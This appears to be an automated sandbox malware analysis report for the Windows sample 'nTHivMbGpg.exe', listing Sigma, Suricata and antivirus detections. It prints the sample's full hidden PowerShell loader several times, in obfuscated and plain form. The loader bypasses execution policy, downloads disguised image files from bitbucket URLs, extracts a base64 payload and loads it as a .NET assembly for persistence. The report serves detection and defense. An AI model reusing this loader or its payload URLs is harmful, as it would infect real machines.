Bu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nTHivMbGpg.exe, ProcessId: 1664, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Sigma detected: Use Short Name Path in Command Line
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", CommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", ProcessId: 7244, ProcessName: rundll32.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-02T19:02:44.809157+020028033053Unknown Traffic192.168.2.749700185.166.143.50443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: nTHivMbGpg.exeAvira: detected
        Multi AV Scanner detection for submitted file
        Source: nTHivMbGpg.exeReversingLabs: Detection: 39%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.8% probability
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD213214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF6FD213214
        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49699 version: TLS 1.2
        Source: nTHivMbGpg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: s\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498B2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: nTHivMbGpg.exe
        Source: Binary string: wextract.pdbGCTL source: nTHivMbGpg.exe
        Source: Binary string: dows\System.Core.pdbL source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
